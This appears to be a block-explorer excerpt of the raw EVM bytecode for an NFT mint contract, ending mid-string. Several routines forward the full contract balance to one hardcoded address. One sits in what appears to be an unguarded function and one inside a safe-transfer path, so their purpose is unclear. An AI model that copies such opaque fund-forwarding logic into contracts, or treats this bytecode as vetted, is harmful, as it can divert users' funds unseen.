a57600080fd5b610fd48282611a7d565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611127573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561104c5761104785858585611a9b565b611134565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401611095929190612546565b60206040518083038186803b1580156110ad57600080fd5b505afa1580156110c1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110e591906122e5565b61112657336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161111d919061252b565b60405180910390fd5b5b61113385858585611a9b565b5b5050505050565b606061114682611b0e565b60405160200161115691906124fe565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112116113a9565b11158015611220575060005482105b801561125e575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061127082610c7a565b90508073ffffffffffffffffffffffffffffffffffffffff16611291611b67565b73ffffffffffffffffffffffffffffffffffffffff16146112f4576112bd816112b8611b67565b611172565b6112f3576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113b98261175d565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611420576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142c84611b6f565b91509150611442818761143d611b67565b611b96565b61148e5761145786611452611b67565b611172565b61148d576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156114f5576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115028686866001611bda565b801561150d57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115db856115b7888887611be0565b7c020000000000000000000000000000000000000000000000000000000017611c08565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611663576000600185019050600060046000838152602001908152602001600020541415611661576000548114611660578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116cb8686866001611c33565b505050505050565b600047111561173c577348764320dc3993ddf674a3c578acdeef4cd7278d73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611736573d6000803e3d6000fd5b50611758565b61175783838360405180602001604052806000815250610fd8565b5b505050565b6000808290508061176c6113a9565b116117f4576000548110156117f35760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821614156117f1575b60008114156117e75760046000836001900393508381526020019081526020016000205490506117bc565b8092505050611826565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60003414156119405760018114801561185d5750611847611c39565b600e600043815260200190815260200160002054105b80156118a95750600b54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118b257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906119029061292b565b9190505550600e6000438152602001908152602001600020600081548092919061192b9061292b565b919050555061193b336001611a7d565b61196f565b600c5481111561194f57600080fd5b600a548161195d919061274e565b341061196e5761196d3382611a7d565b5b5b50565b806007600061197f611b67565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2c611b67565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a7191906125bb565b60405180910390a35050565b611a97828260405180602001604052806000815250611c61565b5050565b611aa6848484610830565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611b0857611ad184848484611cfe565b611b07576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b5257600184039350600a81066030018453600a8104905080611b4d57611b52565b611b27565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bf7868684611e5e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c45610819565b600954611c5291906127a8565b611c5c919061271d565b905090565b611c6b8383611e67565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cf957600080549050600083820390505b611cab6000868380600101945086611cfe565b611ce1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c98578160005414611cf657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d24611b67565b8786866040518563ffffffff1660e01b8152600401611d46949392919061256f565b602060405180830381600087803b158015611d6057600080fd5b505af1925050508015611d9157506040513d601f19601f82011682018060405250810190611d8e919061233f565b60015b611e0b573d8060008114611dc1576040519150601f19603f3d011682016040523d82523d6000602084013e611dc6565b606091505b50600081511415611e03576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611ea8576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611eb56000848385611bda565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f2c83611f1d6000866000611be0565b611f2685612024565b17611c08565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fcd57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f92565b506000821415612009576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600081905550505061201f6000848385611c33565b505050565b60006001821460e11b9050919050565b600061204761204284612653565b61262e565b90508281526020810184848401111561206357612062612a35565b5b61206e848285612886565b509392505050565b60008135905061208581612af3565b92915050565b60008135905061209a81612b0a565b92915050565b6000815190506120af81612b0a565b92915050565b6000813590506120c481612b21565b92915050565b6000815190506120d981612b21565b92915050565b600082601f8301126120f4576120f3612a30565b5b8135612104848260208601612034565b91505092915050565b60008135905061211c81612b38565b92915050565b60006020828403121561213857612137612a3f565b5b600061214684828501612076565b91505092915050565b6000806040838503121561216657612165612a3f565b5b600061217485828601612076565b925050602061218585828601612076565b9150509250929050565b6000806000606084860312156121a8576121a7612a3f565b5b60006121b686828701612076565b93505060206121c786828701612076565b92505060406121d88682870161210d565b9150509250925092565b600080600080608085870312156121fc576121fb612a3f565b5b600061220a87828801612076565b945050602061221b87828801612076565b935050604061222c8782880161210d565b925050606085013567ffffffffffffffff81111561224d5761224c612a3a565b5b612259878288016120df565b91505092959194509250565b6000806040838503121561227c5761227b612a3f565b5b600061228a85828601612076565b925050602061229b8582860161208b565b9150509250929050565b600080604083850312156122bc576122bb612a3f565b5b60006122ca85828601612076565b92505060206122db8582860161210d565b9150509250929050565b6000602082840312156122fb576122fa612a3f565b5b6000612309848285016120a0565b91505092915050565b60006020828403121561232857612327612a3f565b5b6000612336848285016120b5565b91505092915050565b60006020828403121561235557612354612a3f565b5b6000612363848285016120ca565b91505092915050565b60006020828403121561238257612381612a3f565b5b60006123908482850161210d565b91505092915050565b600080604083850312156123b0576123af612a3f565b5b60006123be8582860161210d565b92505060206123cf8582860161210d565b9150509250929050565b6123e2816127dc565b82525050565b6123f1816127ee565b82525050565b600061240282612684565b61240c818561269a565b935061241c818560208601612895565b61242581612a44565b840191505092915050565b61243981612850565b82525050565b600061244a8261268f565b61245481856126ab565b9350612464818560208601612895565b61246d81612a44565b840191505092915050565b60006124838261268f565b61248d81856126bc565b935061249d818560208601612895565b80840191505092915050565b60006124b66043836126bc565b91506124c182612a55565b604382019050919050565b60006124d96005836126bc565b91506124e482612aca565b600582019050919050565b6124f881612846565b82525050565b6000612509826124a9565b91506125158284612478565b9150612520826124cc565b915081905092915050565b600060208201905061254060008301846123d9565b92915050565b600060408201905061255b60008301856123d9565b61256860208301846123d9565b9392505050565b600060808201905061258460008301876123d9565b61259160208301866123d9565b61259e60408301856124ef565b81810360608301526125b081846123f7565b905095945050505050565b60006020820190506125d060008301846123e8565b92915050565b60006020820190506125eb6000830184612430565b92915050565b6000602082019050818103600083015261260b818461243f565b905092915050565b600060208201905061262860008301846124ef565b92915050565b6000612638612649565b905061264482826128fa565b919050565b6000604051905090565b600067ffffffffffffffff82111561266e5761266d612a01565b5b61267782612a44565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b60006126d282612846565b91506126dd83612846565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561271257612711612974565b5b828201905092915050565b600061272882612846565b915061273383612846565b925082612743576127426129a3565b5b828204905092915050565b600061275982612846565b915061276483612846565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561279d5761279c612974565b5b828202905092915050565b60006127b382612846565b91506127be83612846565b9250828210156127d1576127d0612974565b5b828203905092915050565b60006127e782612826565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600061285b82612862565b9050919050565b600061286d82612874565b9050919050565b600061287f82612826565b9050919050565b82818337600083830152505050565b60005b838110156128b3578082015181840152602081019050612898565b838111156128c2576000848401525b50505050565b600060028204905060018216806128e057607f821691505b602082108114156128f4576128f36129d2565b5b50919050565b61290382612a44565b810181811067ffffffffffffffff8211171561292257612921612a01565b5b80604052505050565b600061293682612846565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561296957612968612974565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f697066733a2f2f62616679626569677a6272336c6136736e356861767466697060008201527f763333666f64613434756f356a6f61647634667464617769777778676f68726160208201527f79712f0000000000000000000000000000000000000000000000000000000000604082015250565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b612afc816127dc565b8114612b0757600080fd5b50565b612b13816127ee565b8114612b1e57600080fd5b50565b612b2a816127fa565b8114612b3557600080fd5b50565b612b4181612846565b8114612b4c57600080fd5b5056fea2646970667358221220c2b3038db840730d6c4a7ec0602c831175862bd650e54af7a52756c628e6ccc264736f6c63430008070033

Deployed Bytecode

0x60806040526004361061014b5760003560e01c806370a08231116100b6578063a22cb4651161006f578063a22cb4651461044a578063aa35cca314610473578063b88d4fde1461049c578063c87b56dd146104b8578063d5abeb01146104f5578063e985e9c5146105205761014b565b806370a08231146103455780637f942b5f146103825780638da5cb5b146103ad57806395d89b41146103d8578063a035b1fe14610403578063a0712d681461042e5761014b565b806338b08fd41161010857806338b08fd4146102585780633a233f89146102815780633ccfd60b146102aa57806341f43434146102c157806342842e0e146102ec5780636352211e146103085761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190612312565b61055d565b60405161018491906125bb565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125f1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da919061236c565b610681565b6040516101ec919061252b565b60405180910390f35b61020f600480360381019061020a91906122a5565b610700565b005b34801561021d57600080fd5b50610226610819565b6040516102339190612613565b60405180910390f35b6102566004803603810190610251919061218f565b610830565b005b34801561026457600080fd5b5061027f600480360381019061027a9190612399565b610990565b005b34801561028d57600080fd5b506102a860048036038101906102a3919061214f565b6109fc565b005b3480156102b657600080fd5b506102bf610a65565b005b3480156102cd57600080fd5b506102d6610b08565b6040516102e391906125d6565b60405180910390f35b6103066004803603810190610301919061218f565b610b1a565b005b34801561031457600080fd5b5061032f600480360381019061032a919061236c565b610c7a565b60405161033c919061252b565b60405180910390f35b34801561035157600080fd5b5061036c60048036038101906103679190612122565b610c8c565b6040516103799190612613565b60405180910390f35b34801561038e57600080fd5b50610397610d45565b6040516103a49190612613565b60405180910390f35b3480156103b957600080fd5b506103c2610d4b565b6040516103cf919061252b565b60405180910390f35b3480156103e457600080fd5b506103ed610d71565b6040516103fa91906125f1565b60405180910390f35b34801561040f57600080fd5b50610418610e03565b6040516104259190612613565b60405180910390f35b6104486004803603810190610443919061236c565b610e09565b005b34801561045657600080fd5b50610471600480360381019061046c9190612265565b610e36565b005b34801561047f57600080fd5b5061049a600480360381019061049591906122a5565b610f4f565b005b6104b660048036038101906104b191906121e2565b610fd8565b005b3480156104c457600080fd5b506104df60048036038101906104da919061236c565b61113b565b6040516104ec91906125f1565b60405180910390f35b34801561050157600080fd5b5061050a61116c565b6040516105179190612613565b60405180910390f35b34801561052c57600080fd5b506105476004803603810190610542919061214f565b611172565b60405161055491906125bb565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128c8565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128c8565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611206565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610778929190612546565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122e5565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061252b565b60405180910390fd5b5b6108148383611265565b505050565b60006108236113a9565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561097e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a35761089e8484846113ae565b61098a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108ec929190612546565b60206040518083038186803b15801561090457600080fd5b505afa158015610918573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061093c91906122e5565b61097d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610974919061252b565b60405180910390fd5b5b6109898484846113ae565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109ea57600080fd5b81600b81905550806009819055505050565b6000471115610a61577348764320dc3993ddf674a3c578acdeef4cd7278d73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a5f573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610abf57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b05573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c68573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b8d57610b888484846116d3565b610c74565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bd6929190612546565b60206040518083038186803b158015610bee57600080fd5b505afa158015610c02573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2691906122e5565b610c6757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c5e919061252b565b60405180910390fd5b5b610c738484846116d3565b5b50505050565b6000610c858261175d565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d80906128c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610dac906128c8565b8015610df95780601f10610dce57610100808354040283529160200191610df9565b820191906000526020600020905b815481529060010190602001808311610ddc57829003601f168201915b5050505050905090565b600a5481565b60095481610e15610819565b610e1f91906126c7565b1115610e2a57600080fd5b610e338161182b565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f40576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610eae929190612546565b60206040518083038186803b158015610ec657600080fd5b505afa158015610eda573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610efe91906122e5565b610f3f57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f36919061252b565b60405180910390fd5b5b610f4a8383611972565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fa957600080fd5b60095481610fb5610819565b610fbf91906126c7565b1115610fca57600080fd5b610fd48282611a7d565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611127573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561104c5761104785858585611a9b565b611134565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401611095929190612546565b60206040518083038186803b1580156110ad57600080fd5b505afa1580156110c1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110e591906122e5565b61112657336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161111d919061252b565b60405180910390fd5b5b61113385858585611a9b565b5b5050505050565b606061114682611b0e565b60405160200161115691906124fe565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112116113a9565b11158015611220575060005482105b801561125e575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061127082610c7a565b90508073ffffffffffffffffffffffffffffffffffffffff16611291611b67565b73ffffffffffffffffffffffffffffffffffffffff16146112f4576112bd816112b8611b67565b611172565b6112f3576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113b98261175d565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611420576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142c84611b6f565b91509150611442818761143d611b67565b611b96565b61148e5761145786611452611b67565b611172565b61148d576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156114f5576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115028686866001611bda565b801561150d57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115db856115b7888887611be0565b7c020000000000000000000000000000000000000000000000000000000017611c08565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611663576000600185019050600060046000838152602001908152602001600020541415611661576000548114611660578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116cb8686866001611c33565b505050505050565b600047111561173c577348764320dc3993ddf674a3c578acdeef4cd7278d73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611736573d6000803e3d6000fd5b50611758565b61175783838360405180602001604052806000815250610fd8565b5b505050565b6000808290508061176c6113a9565b116117f4576000548110156117f35760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821614156117f1575b60008114156117e75760046000836001900393508381526020019081526020016000205490506117bc565b8092505050611826565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60003414156119405760018114801561185d5750611847611c39565b600e600043815260200190815260200160002054105b80156118a95750600b54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118b257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906119029061292b565b9190505550600e6000438152602001908152602001600020600081548092919061192b9061292b565b919050555061193b336001611a7d565b61196f565b600c5481111561194f57600080fd5b600a548161195d919061274e565b341061196e5761196d3382611a7d565b5b5b50565b806007600061197f611b67565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2c611b67565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a7191906125bb565b60405180910390a35050565b611a97828260405180602001604052806000815250611c61565b5050565b611aa6848484610830565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611b0857611ad184848484611cfe565b611b07576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b5257600184039350600a81066030018453600a8104905080611b4d57611b52565b611b27565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bf7868684611e5e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c45610819565b600954611c5291906127a8565b611c5c919061271d565b905090565b611c6b8383611e67565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cf957600080549050600083820390505b611cab6000868380600101945086611cfe565b611ce1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c98578160005414611cf657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d24611b67565b8786866040518563ffffffff1660e01b8152600401611d46949392919061256f565b602060405180830381600087803b158015611d6057600080fd5b505af1925050508015611d9157506040513d601f19601f82011682018060405250810190611d8e919061233f565b60015b611e0b573d8060008114611dc1576040519150601f19603f3d011682016040523d82523d6000602084013e611dc6565b606091505b50600081511415611e03576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611ea8576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611eb56000848385611bda565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f2c83611f1d6000866000611be0565b611f2685612024565b17611c08565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fcd57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f92565b506000821415612009576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600081905550505061201f6000848385611c33565b505050565b60006001821460e11b9050919050565b600061204761204284612653565b61262e565b90508281526020810184848401111561206357612062612a35565b5b61206e848285612886565b509392505050565b60008135905061208581612af3565b92915050565b60008135905061209a81612b0a565b92915050565b6000815190506120af81612b0a565b92915050565b6000813590506120c481612b21565b92915050565b6000815190506120d981612b21565b92915050565b600082601f8301126120f4576120f3612a30565b5b8135612104848260208601612034565b91505092915050565b60008135905061211c81612b38565b92915050565b60006020828403121561213857612137612a3f565b5b600061214684828501612076565b91505092915050565b6000806040838503121561216657612165612a3f565b5b600061217485828601612076565b925050602061218585828601612076565b9150509250929050565b6000806000606084860312156121a8576121a7612a3f565b5b60006121b686828701612076565b93505060206121c786828701612076565b92505060406121d88682870161210d565b9150509250925092565b600080600080608085870312156121fc576121fb612a3f565b5b600061220a87828801612076565b945050602061221b87828801612076565b935050604061222c8782880161210d565b925050606085013567ffffffffffffffff81111561224d5761224c612a3a565b5b612259878288016120df565b91505092959194509250565b6000806040838503121561227c5761227b612a3f565b5b600061228a85828601612076565b925050602061229b8582860161208b565b9150509250929050565b600080604083850312156122bc576122bb612a3f565b5b60006122ca85828601612076565b92505060206122db8582860161210d565b9150509250929050565b6000602082840312156122fb576122fa612a3f565b5b6000612309848285016120a0565b91505092915050565b60006020828403121561232857612327612a3f565b5b6000612336848285016120b5565b91505092915050565b60006020828403121561235557612354612a3f565b5b6000612363848285016120ca565b91505092915050565b60006020828403121561238257612381612a3f565b5b60006123908482850161210d565b91505092915050565b600080604083850312156123b0576123af612a3f565b5b60006123be8582860161210d565b92505060206123cf8582860161210d565b9150509250929050565b6123e2816127dc565b82525050565b6123f1816127ee565b82525050565b600061240282612684565b61240c818561269a565b935061241c818560208601612895565b61242581612a44565b840191505092915050565b61243981612850565b82525050565b600061244a8261268f565b61245481856126ab565b9350612464818560208601612895565b61246d81612a44565b840191505092915050565b60006124838261268f565b61248d81856126bc565b935061249d818560208601612895565b80840191505092915050565b60006124b66043836126bc565b91506124c182612a55565b604382019050919050565b60006124d96005836126bc565b91506124e482612aca565b600582019050919050565b6124f881612846565b82525050565b6000612509826124a9565b91506125158284612478565b9150612520826124cc565b915081905092915050565b600060208201905061254060008301846123d9565b92915050565b600060408201905061255b60008301856123d9565b61256860208301846123d9565b9392505050565b600060808201905061258460008301876123d9565b61259160208301866123d9565b61259e60408301856124ef565b81810360608301526125b081846123f7565b905095945050505050565b60006020820190506125d060008301846123e8565b92915050565b60006020820190506125eb6000830184612430565b92915050565b6000602082019050818103600083015261260b818461243f565b905092915050565b600060208201905061262860008